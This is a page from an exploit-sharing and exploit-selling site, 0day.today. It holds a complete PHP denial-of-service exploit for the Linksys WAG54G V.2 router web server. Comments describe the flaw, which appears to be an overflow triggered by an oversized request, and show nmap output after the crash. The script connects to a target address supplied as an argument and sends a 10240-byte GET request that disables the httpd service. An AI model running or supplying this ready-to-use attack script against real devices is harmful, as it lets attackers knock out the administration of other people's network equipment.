0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit
=========================================================== Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit =========================================================== <?php /* * LinkSys Wireless ADSL Router httpd DoS Vulnerability * * Product : Linksys (Division of Cisco Systems) * Device : WAG54G V.2 * Firmware: 1.02.20 * Notes : Other devices and firmware versions are no doubt vulnerable. * * Written by: r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) * * Sending a large HTTP GET/POST request (10240) to the router results in DoS * of the httpd service. * * After discovering this vulnerability I read about similar vulnerabilities * in different devices. It would seem this device is vulnerable to more * previously disclosed vulnerabilities also, just this device was not tested. * * It has been suggested that this is a stack overflow vulnerability. * http://www.securiteam.com/securitynews/5NP0D15GUE.html * http://www.securityfocus.com/bid/6301/info * * unable to connect to 192.168.1.1:80 (Connection refused) * * r0ut3r@kit:~> nmap 192.168.1.1 * * Starting Nmap 4.20 ( http://insecure.org ) at 2008-12-12 12:17 EST * Interesting ports on 192.168.1.1: * Not shown: 1695 closed ports * PORT STATE SERVICE * 23/tcp open telnet * 443/tcp open https * * Nmap finished: 1 IP address (1 host up) scanned in 7.403 seconds * * Looks like HTTP died... * HTTPS is running however you cannot login. The service is basically useless. * Telnet is also open for administration (if configured to be). * * Apart from not being able to use the Web Administration Interface the device * seems to function fine. */ set_time_limit(0); $host = "192.168.1.1"; //Default IP is 192.168.1.1 if (isset($argv[1])) $host = $argv[1]; $port = 80; echo "Connecting...\n"; $conn = fsockopen($host, $port, $errno, $errstr); if ($conn) { $payload = "GET /".str_repeat('A', 10240)." HTTP/1.1"; if (fwrite($conn, $payload)) echo "Payload sent!\n"; fclose($conn); } ?> # 0day.today [2024-06-28] #